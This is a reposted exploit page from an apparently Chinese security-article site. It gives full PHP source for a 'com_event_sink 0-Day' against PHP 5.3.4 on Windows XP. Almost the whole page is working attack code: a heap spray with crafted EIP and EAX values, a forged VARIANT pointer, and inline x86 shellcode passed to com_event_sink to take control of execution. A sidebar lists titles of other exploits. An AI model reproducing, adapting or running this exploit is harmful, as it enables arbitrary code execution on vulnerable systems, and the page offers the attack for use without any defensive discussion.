PHP 5.3.4 com_event

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

PHP 5.3.4 com_event_sink 0-Day

来源：http://twitter.com/fb1h2s 作者：fb1h2s 发布时间：2012-10-11

<?php
 //PHP 5.3.4 
 
 //
//$eip ="\x44\x43\x42\x41";
$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
$deodrant="";
$axespray = str_repeat($eip.$eax,0x80);

//048d0190
echo strlen($axespray);
echo  "PHP 5.3.4 WIN Com Module COM_SINK 0-day\n" ;
echo  "By Rahul Sasi : http://twitter.com/fb1h2s\n" ;
echo  "Exploit Tested on:\n Microsoft XP Pro 2002 SP2 \n" ;
echo  "More Details Here:\n http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/\n" ;


//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++)
{
    $deodrant.=$axespray;
}


$terminate = "T";

$u[] =$deodrant;

$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;

 
//$vVar = new VARIANT(0x048d0038+$offset); // This is what we controll
$vVar = new VARIANT(0x048d0000+180); 
//alert box Shellcode 
$buffer = "\x90\x90\x90".
          "\xB9\x38\xDD\x82\x7C\x33\xC0\xBB".
            "\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";

$var2 = new VARIANT(0x41414242);

com_event_sink($vVar,$var2,$buffer);


?>

[

推荐] [

评论(1条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告